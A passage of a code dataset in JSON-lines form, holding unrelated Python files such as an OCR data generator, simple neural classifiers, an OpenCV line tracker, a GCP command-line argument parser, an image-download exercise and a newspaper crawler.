mask)\n out = cv2.resize(out, (OUTPUT_SHAPE[1], OUTPUT_SHAPE[0]))\n out = numpy.clip(out, 0., 1.)\n\n if M[0, 2] > 0:\n break\n return out, label\n\n\ndef name_training_data_generator(batch_size=32):\n a = get_all_font_char_ims(31)\n # print(type(a[0]))\n XX = np.zeros((batch_size, OUTPUT_SHAPE[0], OUTPUT_SHAPE[1], 1), dtype=np.float32)\n # print(OUTPUT_SHAPE[0])\n # YY = np.zeros((batch_size, OUTPUT_SHAPE[1]), dtype=np.float32)\n\n label_length = np.ones(batch_size)\n # print(Y)\n label_len = np.zeros(batch_size, dtype=np.int64)\n while True:\n length = random.choice(LENGTHS)\n n_len = length+2\n Y = np.ones((batch_size, n_len), dtype=np.float32) * -2\n YY = np.ones((batch_size, n_len), dtype=np.float32) * -2\n for i in range(batch_size):\n img, label = generate_im(a[0], length)\n label_length[i] = len(label)\n\n blur_rand = random.randint(0, 4)\n kernel_size = random.randint(0, 2) * 2 + 1\n\n if blur_rand != 0:\n img = img * 255.0\n img = img.astype(np.uint8)\n img = cv2.medianBlur(img, kernel_size)\n img = img / 255.0\n blur_rand = random.randint(0, 4)\n kernel_size = random.randint(0, 2) * 2 + 1\n sigma = random.randint(0, 3)\n if blur_rand != 0:\n img = cv2.GaussianBlur(img, (kernel_size, kernel_size), sigma)\n\n img_gray = 0.11*img[:,:,0] + 0.59*img[:,:,1] + 0.3*img[:,:,2]\n img_gray = img_gray[..., np.newaxis]\n XX[i] = img_gray\n for index, code in enumerate(label):\n Y[i][0] = -3\n Y[i][index+1] = DIGITS.find(code)\n YY[i][index] = DIGITS.find(code)\n yield {'input': XX, 'train_output': Y+3, 'target_output': YY+3, 'train_length': [n_len]*batch_size}\n\n\nif __name__ == '__main__':\n batch_size = 2\n r = next(name_training_data_generator(batch_size))\n for i in range(batch_size):\n cv2.imwrite(str(i)+'.jpg', 255*r['input'][i])\n print(r['train_output'][i])\n print(r['target_output'][i])\n\n","sub_path":"data_generator_att.py","file_name":"data_generator_att.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"576605091","text":"'''\n풀이\ndp[i] = i번째 인덱스까지의 가장 큰 부분 배열 합\n'''\nimport sys\ninput = sys.stdin.readline\n\ndef maximum_subarray(N:int,arr:list):\n dp = [0]*(N)\n dp[0] = arr[0]\n for i in range(1,N):\n dp[i] = max(dp[i-1]+arr[i],arr[i])\n print(\"dp :\",dp)\n return max(dp)\n\nT = int(input())\nfor _ in range(T):\n N = int(input())\n arr = list(map(int,input().split()))\n \n print(maximum_subarray(N,arr))\n","sub_path":"백준/Python/카테고리/구간합/10211(Maximum Subarray).py","file_name":"10211(Maximum Subarray).py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"638322888","text":"import cv2\nimport numpy as np\nimport time\n'''\nOverall strategy for building trajectory:\n1. analyze the image looking for first instance of correctly colored\n pixel and stores col location in array\n2. averages col location for top half and bottom half of array\n3. uses averages as points to create a line\n\nKNOWN ISSUES:\n1. If a color pixel is not in a row i.e. line only present in half the photo\nthe average values are thwon off.\n2. Glare from lights changes the color of the image line causing for\nbad data\n\nTO fix: Find a way to only include \"good\" data points in average\ncalculations\nONCE FIEXED: a trajectory for the cart to follow can be calculated\n\nSUGGESTIONS: change array to be a list to implement a stack, push on stack\ngood data points and pop from stack for calculating average points\n'''\n\ncap = cv2.VideoCapture(0) #starts feed of camera\n#important code will error out if no camera is connected to rpi\n\ncap.set(3, 200) #initialize values for camera\n\nwhile(True):\n ret, img = cap.read() #get image frame from camera\n \n points = [0 for row in range(img.shape[0]/2)]\n #initialize array of zeros with size of half the hieght of image\n \n count = 0 #count number of points that match color of line in a row\n \n \n for i in range(0,img.shape[0],2): #itterate through every other row of pixels\n for j in range(0,img.shape[1],2): #itterate thourhg every other column in row\n if(abs(img[i][j][0] - 175)< 30 and abs(img[i][j][1] - 100)< 30 and abs(img[i][j][2] - 100)< 30):\n #^compares pixel values to see if it is close to line color\n \n img[i][j] = [0,0,0] #colors pixel black for visual purposes\n points[i/2] = j #stores col number\n count = count + 1 #adds one to count\n break #stops itteration of that row\n \n #color of current line (175, 100, 100)\n \n #calculating average values\n top_avg = 0; #average column value for top half of line\n bot_avg = 0; #average column value for bottom half of line\n for i in range(0,img.shape[0]/4): #itterate through list of stored col\n top_avg = top_avg + points[i] #sum all values in first half of points\n bot_avg = bot_avg + points[i+img.shape[0]/4] #sum of all values of second half of poitns\n top_avg = top_avg / (img.shape[0]/4) #average top values\n bot_avg = bot_avg / (img.shape[0]/4) #average bottom values \n cv2.line(img,(top_avg,img.shape[0]/6),(bot_avg,5*img.shape[0]/6),(0,0,255),5)\n #^draws line on image\n cv2.imshow('frame',img) #displays image\n \n if cv2.waitKey(1) & 0xFF == ord('q'): #if q on keyboard is pressed stop execution\n break\ncv2.destroyAllWindows() #closes opened window","sub_path":"line_detect.py","file_name":"line_detect.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"370361231","text":"import time\nfrom datetime import date, datetime, timedelta\nimport pytz\n\n# aDate = datetime(2020, 10, 18)\n# bDate = datetime.now()\n# delta = bDate - aDate\n\n# new_date = datetime(2020, 10, 18, bDate.hour, bDate.minute, bDate.second) + timedelta(days=delta.days*3) + (timedelta(days=(bDate.hour//8-2)))\n# print(bDate.hour//8)\n# print(new_date)\n\ndef suffix(d):\n return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')\n\nmonths = [\n \"Hammer\",\n \"Alturiak\",\n \"Ches\",\n \"Tarsakh\",\n \"Mirtul\",\n \"Kythorn\",\n \"Flamerule\",\n \"Eleasis\",\n \"Eleint\",\n \"Marpenoth\",\n \"Uktar\",\n \"Nightal\"]\n \naDate = datetime(2020, 10, 18, tzinfo=pytz.timezone('UTC'))\nbDate = datetime.now(pytz.timezone('UTC'))\ndelta = bDate - aDate\n\ngametime = datetime(2020, 10, 18, bDate.hour, bDate.minute, bDate.second) + timedelta(days=delta.days*3) + (timedelta(days=(bDate.hour//8-2)))\n\nif gametime.hour == 0:\n gametime_hour = 12\n time_decor = \"AM\"\nelse:\n gametime_hour = gametime.hour-12 if gametime.hour > 12 else gametime.hour\n time_decor = \"PM\" if gametime.hour > 12 else \"AM\"\ngametime_minute = \"0{}\".format(gametime.minute) if gametime.minute < 10 else gametime.minute\n\nprint(\"{}:{} {} UTC | {}{} of {}\".format(gametime_hour, gametime_minute, time_decor, gametime.day, suffix(gametime.day), months[gametime.month-1]))","sub_path":"Cogs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"580740249","text":"#_*_ coding: utf_8 _*_\n\nclass Settings(object):\n \"\"\"存储游戏基本设置\"\"\"\n def __init__(self):\n #飞船移动标志\n self.ship_move_up = False\n self.ship_move_down = False\n\n #飞船移动速度\n self.ship_speed = 1\n\n #方块移动方向标记\n self.dia_direction_sign = -1\n \n\n\n","sub_path":"练习/shoot_game/all_settings.py","file_name":"all_settings.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"349169295","text":"# coding=utf-8\n__author__ = 'J Tas'\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\n# =====================================================================\n\n\nclass Perceptron(object):\n \"\"\"\n This class implements an algorithm (based on perceptron learning rule)\n for supervised learning of binary classifiers.\n \"\"\"\n\n def __init__(self, eta=0.01, n=15):\n self.eta = eta\n self.n = n\n self.w = []\n self.error = []\n\n def train(self, xlist, ylist):\n \"\"\"\n :type xlist: list of lists (i.e 2D list)\n :type ylist: list\n \"\"\"\n self.w = [0] * len(xlist[0]) # init. weights\n for k in range(self.n):\n cnt = 0\n for x, y in zip(xlist, ylist):\n delta = y - self.predict(x) # misclassification: != 0\n if delta != 0:\n cnt += 1\n for i, xi in enumerate(x):\n self.w[i] += self.eta * delta * xi\n self.error.append(cnt)\n\n def predict(self, x):\n return 0 if np.dot(self.w, x) < 0.0 else 1\n\n def plot_classification_error(self):\n plt.plot(range(1, len(self.error) + 1), self.error, marker='o')\n plt.xlabel('Iterations')\n plt.ylabel('Missclassifications')\n plt.show()\n\n\nclass Adaline(object):\n \"\"\"\n This class implements an algorithm (based on adaline learning rule)\n for supervised learning of binary classifiers.\n \"\"\"\n\n def __init__(self, eta=0.01, n=15):\n self.eta = eta\n self.n = n\n\n def train(self, xlist, ylist):\n \"\"\"\n :type xlist: list of lists (i.e 2D list)\n :type ylist: list\n \"\"\"\n x = np.asarray(xlist)\n y = np.asarray(ylist)\n self.w = np.zeros(x.shape[1])\n for k in range(self.n):\n delta = y - self.predict(x) # calculate delta\n print(np.sum(delta))\n self.w += self.eta * x.T.dot(delta)\n\n def predict(self, x):\n return np.where(np.dot(self.w, x.T) < 0.0, 0, 1)\n\n\n# =====================================================================\n\n\ndef load():\n link = 'https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'\n df = pd.read_csv(link, header=None)\n y = df.iloc[:, 4].values\n y = np.where(y == 'Iris-setosa', 0, 1)\n x = df.iloc[:, [0, 1, 2, 3]].values\n return (x - x.mean(axis=0) / x.std(axis=0)), y\n\n\ndef main():\n x, y = load()\n p = Perceptron()\n p.train(x, y)\n p.plot_classification_error()\n print(p.w)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/Numerical Scripts/neuron.py","file_name":"neuron.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"462919909","text":"import random\nimport numpy as np\nfrom collections import defaultdict, namedtuple\nfrom typing import List, Dict, Tuple, Optional\nfrom qanta.config import conf\nfrom qanta.buzzer.util import GUESSERS\n\nBatch = namedtuple('Batch', ['qids', 'answers', 'mask', 'vecs', 'results'])\n\nN_GUESSERS = len(GUESSERS)\nN_GUESSES = conf['buzzer']['n_guesses']\n\nclass QuestionIterator(object):\n '''Each batch contains:\n qids: list, (batch_size,)\n answers: list, (batch_size,)\n mask: list, (length, batch_size,)\n vecs: xp.float32, (length, batch_size, 4 * NUM_GUESSES)\n results: xp.int32, (length, batch_size)\n '''\n\n def __init__(self, dataset: list, option2id: Dict[str, int], batch_size:int,\n bucket_size=4, step_size=1, neg_weight=1, shuffle=True,\n only_hopeful=False):\n self.dataset = dataset\n self.option2id = option2id\n self.batch_size = batch_size\n self.bucket_size = bucket_size\n self.step_size = step_size\n self.neg_weight = neg_weight\n self.shuffle = shuffle\n self.only_hopeful = only_hopeful\n self.epoch = 0\n self.iteration = 0\n self.batch_index = 0\n self.is_end_epoch = False\n self.create_batches()\n\n def dense_vector(self, dicts: List[List[Dict[str, float]]],\n wordvecs: List[List[np.ndarray]], step_size=1) -> List[List[float]]:\n '''Generate dense vectors from a sequence of guess dictionaries.\n dicts: a sequence of guess dictionaries for each guesser\n '''\n length = len(dicts)\n prev_vecs = [[0. for _ in range(N_GUESSERS * N_GUESSES)] \\\n for i in range(step_size)]\n vecs = []\n for i in range(length):\n if len(dicts[i]) != N_GUESSERS:\n raise ValueError(\"Inconsistent number of guessers ({0}, {1}).\".format(\n N_GUESSERS, len(dicts)))\n vec = []\n diff_vec = []\n isnew_vec = []\n word_vec = []\n for j in range(N_GUESSERS):\n dic = sorted(dicts[i][j].items(), key=lambda x: x[1], reverse=True)\n for guess, score in dic:\n vec.append(score)\n if i > 0 and guess in dicts[i-1][j]:\n diff_vec.append(score - dicts[i-1][j][guess])\n isnew_vec.append(0)\n else:\n diff_vec.append(score) \n isnew_vec.append(1)\n if len(dic) < N_GUESSES:\n for k in range(max(N_GUESSES - len(dic), 0)):\n vec.append(0)\n diff_vec.append(0)\n isnew_vec.append(0)\n if wordvecs is not None:\n word_vec += wordvecs[i][j].tolist()\n vecs.append(vec + diff_vec + isnew_vec + word_vec)\n for j in range(1, step_size + 1):\n vecs[-1] += prev_vecs[-j]\n prev_vecs.append(vec)\n if step_size > 0:\n prev_vecs = prev_vecs[-step_size:]\n return vecs\n\n def create_batches(self):\n bucket_size = self.bucket_size\n self.batches = []\n buckets = defaultdict(list)\n for example in self.dataset:\n # pad the sequence of predictions\n qid, answer, dicts, results, wordvecs = example\n \n results = np.asarray(results, dtype=np.int32)\n length, n_guessers = results.shape\n\n if n_guessers != N_GUESSERS:\n raise ValueError(\n \"Inconsistent number of guessers ({0}, {1}.\".format(\n N_GUESSERS, len(n_guessers)))\n\n # hopeful means any guesser guesses correct any time step\n hopeful = np.any(results == 1)\n if self.only_hopeful and not hopeful:\n continue\n\n # append the not buzzing action to each time step\n # not buzzing = 1 when no guesser is correct\n new_results = []\n for i in range(length):\n not_buzz = int(not any(results[i] == 1)) * self.neg_weight\n new_results.append(np.append(results[i], not_buzz))\n results = np.asarray(new_results, dtype=np.int32)\n\n if len(dicts) != length:\n raise ValueError(\"Inconsistant shape of results and vecs.\")\n vecs = self.dense_vector(dicts, wordvecs, self.step_size)\n vecs = np.asarray(vecs, dtype=np.float32)\n assert length == vecs.shape[0]\n self.n_input = len(vecs[0])\n\n padded_length = -((-length) // bucket_size) * bucket_size\n vecs_padded = np.zeros((padded_length, self.n_input))\n vecs_padded[:length,:self.n_input] = vecs\n\n results_padded = np.zeros((padded_length, (N_GUESSERS + 1)))\n results_padded[:length, :(N_GUESSERS + 1)] = results\n\n mask = [1 for _ in range(length)] + \\\n [0 for _ in range(padded_length - length)]\n\n buckets[padded_length].append((qid, answer, mask, vecs_padded,\n results_padded))\n\n for examples in buckets.values():\n for i in range(0, len(examples), self.batch_size):\n qids, answers, mask, vecs, results = \\\n zip(*examples[i : i + self.batch_size])\n batch = Batch(qids, answers, mask, vecs, results)\n self.batches.append(batch)\n\n @property\n def size(self):\n return len(self.batches)\n \n def finalize(self, reset=False):\n if self.shuffle:\n random.shuffle(self.batches)\n if reset:\n self.epoch = 0\n self.iteration = 0\n self.batch_index = 0\n\n def next_batch(self, xp, train=True):\n self.iteration += 1\n if self.batch_index == 0:\n self.epoch += 1\n self.is_end_epoch = (self.batch_index == self.size - 1)\n qids, answers, mask, vecs, results = self.batches[self.batch_index]\n\n vecs = xp.asarray(vecs, dtype=xp.float32).swapaxes(0, 1) # length * batch_size * dim\n results = xp.asarray(results, dtype=xp.int32).swapaxes(0, 1) # length * batch_size * n_guessers\n mask = xp.asarray(mask, dtype=xp.float32).T # length * batch_size\n # results = results * 2 - 1 # convert from (0, 1) to (-1, 1)\n\n self.batch_index = (self.batch_index + 1) % self.size\n batch = Batch(qids, answers, mask, vecs, results)\n return batch\n \n @property\n def epoch_detail(self):\n return self.iteration, self.iteration * 1.0 / self.size\n","sub_path":"qanta/buzzer/iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":6649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"435103251","text":"class DonorObject(object):\n\n def __init__(self, name, weight, gender, birth_date, last_donation, sick, uniqeid, expuniqeid, blood_type, \\\n hemoglobin, email, phone_number, suitable):\n self.name = name\n self.weight = weight\n self.gender = gender\n self.birth_date = birth_date\n self.last_donation = last_donation\n self.sick = sick\n self.uniqeid = uniqeid\n self.expuniqeid = expuniqeid\n self.blood_type = blood_type\n self.hemoglobin = hemoglobin\n self.email = email\n self.phone_number = phone_number\n self.suitable = suitable\n","sub_path":"donor_object.py","file_name":"donor_object.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"541034758","text":"# -*- encoding: utf-8 -*-\n# -*- coding: utf-8 -*-\n\n\nimport sys, os\nsys.path.append(os.path.join(os.pardir, 'util'))\n\nimport similarity\nimport json\nimport numpy\nimport matplotlib.pylab as plt\nimport math\n\ndef load_label(path):\n \"\"\" Load label-list from file.\n \"\"\"\n lbl = []\n with file(path) as opened:\n for line in opened:\n lbl.append([ int(v) for v in line.strip().split() ])\n\n return lbl\n\n\nif __name__ == '__main__':\n\n # Calculate Jaccard-coefficient for all links.\n vals = json.load(open(sys.argv[1]))\n\n vals = [ int(v) for v in vals if int(v) > 0 ]\n total = float(len(vals))\n deg = {}\n for v in vals:\n try:\n deg[v] += 1\n except KeyError:\n deg[v] = 1\n\n for v in deg.keys():\n deg[v] = float(deg[v]) / total\n\n \n \"\"\"\n range_step = 0.01\n total = float(len(vals))\n\n plots = {}\n for x in numpy.arange(1.0, step = range_step):\n plots[x] = float(len([ s for s in vals if x <= s < x + range_step ])) / total\n\n print(plots.values())\n \"\"\"\n \n #plt.plot(numpy.arange(1.0, step = range_step), plots.values())\n #plt.plot(deg.keys(), deg.values(), ',')\n plt.loglog(deg.keys(), deg.values(), ',')\n #plt.xlim(-range_step, 1.0+range_step)\n plt.savefig(sys.argv[2] + '.png')\n\n","sub_path":"stats/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"49060027","text":"import pymel.core as pm\nimport maya.cmds as cmds\n\n\"\"\"\nCamera Tools\n\n\"\"\"\nclass BasicCamera:\n \"\"\"\n Basic repetitive Camera Tasks\n\n \"\"\"\n @staticmethod\n def set_default_render_cam(name=\"RENDER_CAM\"):\n \"\"\"\n Sets the Global RenderCamera Attribute\n \"\"\"\n for cam in pm.ls(cameras=True):\n cam.renderable.set(cam.name().startswith(name))\n \n\n @staticmethod\n def create_render_cam(name=\"RENDER_CAM\"):\n \"\"\"\n Creates a camera and renames it\n\n str name: name of the camera\n bool exposure: connect a mia_exposure_photographic node to the camera\n \"\"\"\n if not pm.objExists(name):\n cam = pm.camera()[0]\n pm.rename(cam, name)\n BasicCamera.set_default_render_cam(name)\n cam = pm.PyNode(name)\n\n cam.getShape().setDisplayResolution(True)\n pm.lookThru(name)\n\n pm.select(cam)\n\n\nif __name__ == \"__main__\":\n BasicCamera.create_render_cam()\n","sub_path":"Scripts/Maya2018/Camera/Basic_RenderCam.py","file_name":"Basic_RenderCam.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"554146926","text":"a,b,k=map(int, input().split())\na,b=b,a\n# a:1, b:0 \n\nif k==0:\n print('Yes')\n print('1'*a+'0'*b)\n print('1'*a+'0'*b)\n exit()\n\nif a<=1 or b==0:\n print('No')\n exit()\n\n\nif a+b-1<=k:\n print('No')\n exit()\n\nzero=b-1\nxl=[0]\nyl=[1]\nfor i in range(k-1):\n if zero>0:\n xl.append(0)\n yl.append(0)\n zero-=1\n else:\n xl.append(1)\n yl.append(1)\n\nxl.append(1)\nyl.append(0)\nfor i in range(a+b-k-2):\n if zero>0:\n xl.append(0)\n yl.append(0)\n zero-=1\n else:\n xl.append(1)\n yl.append(1)\n\nxl.append(1)\nyl.append(1)\n\nxl=[str(x) for x in xl]\nyl=[str(y) for y in yl]\n\nprint('Yes')\nprint(''.join(xl[::-1]))\nprint(''.join(yl[::-1]))\n","sub_path":"2_kakomon/codeforces/1492_d.py","file_name":"1492_d.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"344842915","text":"import random\n\n\nwith open (\"score.txt\", 'r') as best_file:\n best_score = best_file.read()\n # print(len (best_score))\n # for line in best_score:\n print(\"Best Score is : \" + best_score)\n\nsecret = random.randint(1,30)\nattempts = 0\n\nwhile True:\n\n guess =int(input(\"Guess the secret number ( between 1 end 30):\"))\n\n if guess == secret :\n print(\"Congrulatations\")\n with open(\"score.txt\", 'r') as best_file:\n best_score = best_file.read()\n if int(best_score) == attempts :\n print(\"New best score\")\n\n break\n elif guess < secret:\n\n print (\"Increase value\")\n attempts = attempts + 1\n if attempts < int(best_score):\n with open(\"score.txt\", 'w') as best_file:\n best_file.write(str(attempts))\n elif guess > secret:\n print (\"Decrease Value\")\n attempts = attempts + 1\n if attempts < int(best_score):\n with open(\"score.txt\", 'w') as best_file:\n best_file.write(str(attempts))\n\n\n","sub_path":"Aula3/GuestSecret2.py","file_name":"GuestSecret2.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"302028654","text":"# Copyright 2017 Bracket Computing, Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# https://github.com/brkt/brkt-cli/blob/master/LICENSE\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and\n# limitations under the License.\nimport argparse\nfrom brkt_cli.gcp import gcp_args\n\n\ndef setup_wrap_gcp_image_args(parser, parsed_config):\n parser.add_argument(\n 'image',\n metavar='ID',\n help='The image that will be wrapped with the Bracket Metavisor',\n )\n parser.add_argument(\n '--instance-name',\n metavar='NAME',\n dest='instance_name',\n help='Name of the instance'\n )\n parser.add_argument(\n '--instance-type',\n help='Instance type',\n dest='instance_type',\n default='n1-standard-1'\n )\n gcp_args.add_gcp_zone(parser, parsed_config)\n parser.add_argument(\n '--no-delete-boot',\n help='Do not delete boot disk when instance is deleted',\n dest='delete_boot',\n default=True,\n action='store_false'\n )\n gcp_args.add_gcp_project(parser, parsed_config)\n gcp_args.add_gcp_image_project(parser)\n gcp_args.add_gcp_network(parser, parsed_config)\n parser.add_argument(\n '--gcp-tag',\n dest='gcp_tags',\n action='append',\n metavar='VALUE',\n help=(\n 'Set a GCP tag on the encrypted instance being launched. May be '\n 'specified multiple times.'\n )\n )\n gcp_args.add_gcp_encryptor_image(parser)\n gcp_args.add_gcp_encryptor_image_file(parser)\n gcp_args.add_gcp_encryptor_image_bucket(parser)\n # Optional startup script. Hidden because it is only used for development\n # and testing. It should be passed as a string containing a multi-line\n # script (bash, python etc.)\n parser.add_argument(\n '--startup-script',\n help=argparse.SUPPRESS,\n dest='startup_script',\n metavar='SCRIPT'\n )\n gcp_args.add_gcp_subnetwork(parser, parsed_config)\n parser.add_argument(\n '--guest-fqdn',\n metavar='FQDN',\n dest='guest_fqdn',\n help=argparse.SUPPRESS\n )\n gcp_args.add_no_cleanup(parser)\n # Optional (number of) SSD scratch disks because these can only be attached\n # at instance launch time, compared to the other (persistent) disks\n parser.add_argument(\n '--ssd-scratch-disks',\n metavar='N',\n type=int,\n default=0,\n dest='ssd_scratch_disks',\n help='Number of SSD scratch disks to be attached (max. 8)'\n )\n","sub_path":"brkt_cli/gcp/wrap_gcp_image_args.py","file_name":"wrap_gcp_image_args.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"364366267","text":"#!/usr/bin/python\n# Copyright 2010 Google Inc.\n# Licensed under the Apache License, Version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Google's Python Class\n# http://code.google.com/edu/languages/google-python-class/\n\nimport os\nimport re\nimport sys\nimport urllib.request\nimport copyspecial\n\n\"\"\"Logpuzzle exercise\nGiven an apache logfile, find the puzzle urls and download the images.\n\nHere's what a puzzle url looks like:\n10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] \"GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0\" 302 528 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6\"\n\"\"\"\n\n\ndef read_urls(url):\n \"\"\"Returns a list of the puzzle urls from the given log file,\n extracting the hostname from the filename itself.\n Screens out duplicate urls and returns the urls sorted into\n increasing order.\"\"\"\n \n uFile = urllib.request.urlopen(url)\n uFileText = uFile.read()\n imgList = re.findall(r'data-listing-id.*?laptop.*?(https\\S*.jpg)', str(uFileText), re.DOTALL)\n return imgList\n\n \n\ndef download_images(img_urls, dest_dir):\n \"\"\"Given the urls already in the correct order, downloads\n each image into the given directory.\n Gives the images local filenames img0, img1, and so on.\n Creates an index.html in the directory\n with an img tag to show each local image file.\n Creates the directory if necessary.\n \"\"\"\n imgN = 0\n for url in img_urls:\n\n filename = \"img\"+str(imgN)+\".jpg\"\n fullPath = os.path.join(dest_dir, filename)\n urllib.request.urlretrieve(url, fullPath)\n imgN = imgN + 1\n \n file = open('index.html', 'w+')\n file.write('\\n\\n\\n')\n imgList = copyspecial.GetFileLIst(dest_dir)\n imgList.sort()\n for img in imgList:\n imgPath = os.path.join(dest_dir, img)\n file.write('')\n file.write('\\n\\n\\n')\n file.close\n\ndef main():\n args = sys.argv[1:]\n\n if not args:\n print (\"usage: [--todir dir] logfile\")\n sys.exit(1)\n\n todir = args[0]\n if args[0] == '--todir':\n todir = args[1]\n del args[0:2]\n\n img_urls = read_urls(args[0])\n\n if todir:\n if not os.path.isdir(todir):\n os.makedirs(todir)\n download_images(img_urls, todir)\n else:\n print ('\\n'.join(img_urls))\n\nif __name__ == '__main__':\n main()\n","sub_path":"google-python-exercises/logpuzzle/logpuzzle.py","file_name":"logpuzzle.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"560454393","text":"from cc_plugin_ncei.tests.ncei_test_case import NCEITestCase\nfrom cc_plugin_ncei.tests.resources import STATIC_FILES\n\n\nclass TestNCEITimeSeriesProfile(NCEITestCase):\n\n def setUp(self):\n self.run_checker('ncei-timeseries-profile-orthogonal', STATIC_FILES['nodc-timeseries-profile'])\n\n def test_global_profile_score(self):\n assert not self.errors\n\n assert self.results['scored_points'] == 122\n assert self.results['possible_points'] == 126\n known_messages = [\n 'geospatial_lat_resolution should exist and not be empty.',\n 'geospatial_lon_resolution should exist and not be empty.',\n 'sea_name attribute should exist and should be from the NODC sea names list: Cordell Bank National Marine Sanctuary is not a valid sea name',\n 'nodc_template_version attribute must be NODC_NetCDF_TimeSeriesProfile_Orthogonal_Template_v1.1'\n ]\n failed_messages = self.get_failed_messages(self.results['all_priorities'])\n assert sorted(failed_messages) == sorted(known_messages)\n\n","sub_path":"cc_plugin_ncei/tests/test_ncei_timeseries_profile.py","file_name":"test_ncei_timeseries_profile.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"556520161","text":"# python imports\nimport re\nfrom lxml import html\nfrom urllib.parse import urljoin\n\n# local imports\nfrom crawler.source.utils import geocode, request, extract_xpath\nfrom crawler.source.np.townnews import Source\n\nsources = ['http://www.themonitor.com/', 'http://www.valleymorningstar.com/',\n 'http://www.brownsvilleherald.com/', 'http://www.midvalleytowncrier.com/',\n 'http://www.coastalcurrent.com/', 'http://www.oaoa.com/',\n 'http://www.elextratx.com/', 'http://www.elnuevoheraldo.com/']\n\nproperties = {\n\t\"identifier\": \"//a[contains(@href, 'https://aimiservices.')]|//img[@alt='Aim Media TX LLC']\",\n\t\"parent_name\": \"AIM Media TX\",\n\t\"parent_url\": \"http://www.aimmediatexas.com/portfolio/\",\n\t\"parent_sources_xpath\":\"//tr/td[2]/a/@href\",\n\t\"software_name\":\"BLOX Content Management System\",\n\t\"town_news_server\":\"newyork1\",\n\t\"source_name\": \"//meta[@property='og:site_name']/@content\",\n\t\"address\": \"//div[@class='blox-html-asset']//br/preceding-sibling::text()\",\n\t\"email\": re.compile(r'[\\w. _-]+@[\\w-]+\\.\\w+'),\n\t\"phone\": re.compile(r'\\d{3}-\\d{3}-\\d{4}|\\(\\d{3}\\)\\s*\\d{3}-\\d{4}'),\n\t\"source_type\": \"NP\",\n\t\"has_rss\": True,\n\t\"is_popular\": False,\n\t\"crawl_type\": \"R\",\n\t\"contact_page\": \"/site/contact\",\n\t\"rss_path\": \"/search/?q=&t=article&l=30&d=&d1=&d2=&s=start_time&sd=desc&c[]=news*&f=rss\",\n\t\"rss_xpath\":\"\",\n\t\"articles_path\": \"\",\n\t\"articles_xpath\": \"\",\n\t\"icon_xpath\": \"//*[@rel='apple-touch-icon']/@href\",\n\t\"icon_regex\": re.compile(r\"url\\([\\\"']*([\\w./_-]+)[\\\"']*\\)\\s*no-repeat\"),\n}\n\n\nclass Source(Source):\n\n\tdef __init__(self, url, props=properties, page_tree=None):\n\t\tsuper().__init__(url, props, page_tree)\n\n\t@classmethod\n\tdef build_sources(cls, props=properties, source_urls=None):\n\t\tsource_urls = extract_xpath(props['parent_url'], props[\"parent_sources_xpath\"])\n\t\tif not source_urls:\n\t\t\tsource_urls = sources\n\t\treturn super().build_sources(props, source_urls)\n\n\tdef _get_contact_details(self):\n\t\t\"\"\"\n\t\tAddress can be gotten by visiting the profile page of\n\t\teach source at http://www.aimmediatexas.com/portfolio/slug\n\t\tand crawling the address of that page\n\t\t\"\"\"\n\t\tif not self.name:\n\t\t\traise AttributeError('Can\\'t get address without paper name')\n\n\t\tslug = self._slugify(self.name)\n\t\t# exceptions\n\t\tif 'brownsvilleherald' in self.url:\n\t\t\tslug = 'the_brownsville_herald'\n\n\t\turl = urljoin(self.props['parent_url'], slug)\n\t\tpage = request(url)\n\t\tpage_tree = html.fromstring(page.content)\n\t\textract = extract_xpath(page_tree=page_tree, xpath_value=self.props['address'])\n\n\t\t# strip all white space and return only valid elements\n\t\textract = 